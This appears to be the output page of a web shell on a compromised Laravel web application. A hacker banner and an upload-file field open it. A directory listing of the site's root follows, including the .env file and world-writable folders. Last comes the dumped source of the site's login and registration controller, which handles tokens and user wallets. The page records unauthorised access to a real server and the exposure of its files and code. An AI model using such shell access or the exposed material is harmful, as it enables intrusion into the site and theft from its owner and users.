I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file	size	edit	permission
.editorconfig	276 KB	March 05 2024 07:12:34	0666
.env	1385 KB	May 24 2024 16:43:55	0666
.env.example	1088 KB	March 05 2024 07:12:34	0666
.gitattributes	190 KB	March 05 2024 07:12:34	0666
.gitignore	245 KB	March 05 2024 07:12:34	0666
.htaccess	947 KB	July 04 2023 21:25:08	0664
.rnd	1024 KB	March 13 2024 04:51:14	0666
README.md	472 KB	March 22 2024 10:35:00	0666
app	-	March 05 2024 07:12:34	0777
artisan	1739 KB	March 05 2024 07:12:34	0666
bootstrap	-	March 05 2024 07:12:34	0777
composer.json	2829 KB	May 13 2024 12:10:04	0666
composer.lock	417205 KB	March 19 2024 12:13:14	0666
config	-	July 03 2025 02:53:36	0777
database	-	March 05 2024 07:12:34	0777
index.php	1816 KB	May 13 2024 10:32:36	0666
lang	-	May 13 2024 14:53:26	0777
manifest.json	913 KB	May 14 2024 03:57:26	0664
package.json	398 KB	March 05 2024 07:12:34	0666
phpunit.xml	1206 KB	March 05 2024 07:12:34	0666
public	-	July 03 2025 02:37:20	0777
resources	-	May 13 2024 12:09:36	0777
routes	-	March 05 2024 07:12:34	0777
service-worker.js	924 KB	March 05 2024 07:12:34	0666
storage	-	March 05 2024 10:03:52	0777
symlink.php	218 KB	March 05 2024 07:12:34	0666
tests	-	March 05 2024 07:12:34	0777
vendor	-	March 19 2024 12:13:14	0777
vite.config.js	326 KB	March 05 2024 07:12:34	0666

basic_settings = BasicSettingsProvider::get(); } /** * Mehtod for user login * @method POST * @param \Illuminate\Http\Request $request * @return \Illuminate\Http\Request Response */ public function login(Request $request){ $validator = Validator::make($request->all(),[ 'email' => 'required|max:40', 'password' => 'required|min:6', ]); if($validator->fails()){ $error = ['error' => $validator->errors()->all()]; return ApiResponse::validation($error); } $user = User::where('username', trim(strtolower($request->email)))->orWhere('email', $request->email)->first(); if(!$user){ $error = ['error' => [__('The credentials does not match')]]; return ApiResponse::validation($error); } $token = $user->createToken('Laravel Password Grant Client')->accessToken; $user_data = [ 'token' => $token, 'image_path' => get_files_public_path('user-profile'), 'default_image' => get_files_public_path('default'), 'user' => new UserResouce($user) ]; if(Hash::check($request->password, $user->password)){ if($user->status == 0){ $error = ['error'=>[__('Account Has been Suspended')]]; return ApiResponse::validation($error); }elseif($user->email_verified == 0){ $user_authorize = UserAuthorization::where("user_id",$user->id)->first(); $resend_code = generate_random_code(); $user_authorize->update([ 'code' => $resend_code, 'created_at' => now(), ]); $data = $user_authorize->toArray(); $user->notify(new SendAuthorizationCode((object) $data)); $message = ['success' => [__('Please check email and verify your account')]]; return ApiResponse::success($message, $user_data); } $this->refreshUserWallets($user); $this->createLoginLog($user); $message = ['success' => [__('Login Successful')]]; return ApiResponse::success($message,$user_data); }else{ $error = ['error'=>[__('The credentials does not match')]]; return ApiResponse::error($error); } } /** * Mehtod for user register * @method POST * @param \Illuminate\Http\Request $request * @return \Illuminate\Http\Request Response */ public function register(Request $request){ $basic_settings = $this->basic_settings; $passowrd_rule = "required|string|min:6"; if($basic_settings->secure_password) { $passowrd_rule = ["required",Password::min(8)->letters()->mixedCase()->numbers()->symbols()->uncompromised()]; } $agree_policy = $this->basic_settings->agree_policy == 1 ? 'required|in:on' : 'nullable'; $validator = Validator::make($request->all(), [ 'first_name' => 'required|string|max:50', 'last_name' => 'required|string|max:50', 'email' => 'required|email|max:160|unique:users', 'password' => $passowrd_rule, 'policy' => $agree_policy, ]); if($validator->fails()){ $error = ['error'=>$validator->errors()->all()]; return ApiResponse::validation($error); } $validated = $validator->validated(); //User Create $validated = Arr::except($validated,['agree']); $validated['firstname'] = $validated['first_name']; $validated['lastname'] = $validated['last_name']; $validated['email_verified'] = ($basic_settings->email_verification == true) ? 0 : 1; $validated['kyc_verified'] = 0; $validated['sms_verified'] = 0; $validated['status'] = 1; $validated['password'] = Hash::make($validated['password']); $validated['username'] = make_username($validated['first_name'],$validated['last_name']); $user = User::create($validated); $token = $user->createToken('Laravel Password Grant Client')->accessToken; $this->createUserWallets($user); if ($basic_settings->email_verification == true) { $data = [ 'user_id' => $user->id, 'code' => generate_random_code(), 'token' => generate_unique_string("user_authorizations","token",200), 'created_at' => now(), ]; DB::beginTransaction(); try{ UserAuthorization::where("user_id",$user->id)->delete(); DB::table("user_authorizations")->insert($data); $user->notify(new SendAuthorizationCode((object) $data)); DB::commit(); }catch(Exception $e) { DB::rollBack(); $error = ['error'=>[__('Something went wrong! Please try again')]]; return ApiResponse::error($error); } } if ($basic_settings->email_verification == 1 && $basic_settings->email_notification == 1) { $message = ['success' => [__('Please check email and verify your account')]]; } else { $message = ['success' => [__('Registration successful')]]; } $data = [ 'token' => $token, 'image_path' => get_files_public_path('user-profile'), 'default_image' => get_files_public_path('default'), 'user' => new UserResouce($user) ]; return ApiResponse::success($message, $data); } }